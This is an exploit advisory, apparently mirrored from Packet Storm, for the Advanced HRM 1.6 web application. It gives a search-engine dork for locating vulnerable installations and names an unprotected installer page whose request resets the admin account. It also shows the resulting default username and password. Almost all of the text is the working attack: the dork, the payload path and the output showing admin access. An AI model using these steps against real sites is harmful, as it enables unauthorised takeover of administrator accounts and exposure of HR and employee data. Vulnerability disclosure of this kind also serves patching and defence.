Exploit for Advanced HRM 1.6 Insecure Direct Object Reference

## https://sploitus.com/exploit?id=PACKETSTORM:173272
====================================================================================================================================  
| # Title : Advanced HRM v1.6 Reset admin login Vulnerability |  
| # Author : indoushka |  
| # Tested on : windows 10 Français V.(Pro) / browser : Mozilla firefox 62.0.3 (32-bit) |  
| # Vendor : https://codecanyon.net/item/advanced-hrm/17767006 |   
| # Dork : "Copyright © CoderPixel 2016 All Rights Reserved" |  
====================================================================================================================================  
  
  
poc :  
  
[+] Dorking İn Google Or Other Search Enggine .  
  
[+] The Vulnerability revolves around resetting script settings and reformulating a new password for the admin .  
  
[+] use payload : /application/install/step5.php  
  
[+] http://127.0.0.1/appchain.commy/hrm/application/install/step5.php  
  
[+] Congratulations!  
You have just install Advance HRM!  
To Login Admin Portal:  
Use this link - http://127.0.0.1/appchain.commy/hrm/  
Username: admin  
Password: admin.password  
  
Greetings to :=========================================================================================================================  
jericho * Larry W. Cashdollar * brutelogic* hyp3rlinx* 9aylas * djroot.dz * LiquidWorm* Hussin-X *D4NB4R * shadow_00715 * yasMouh |  
=======================================================================================================================================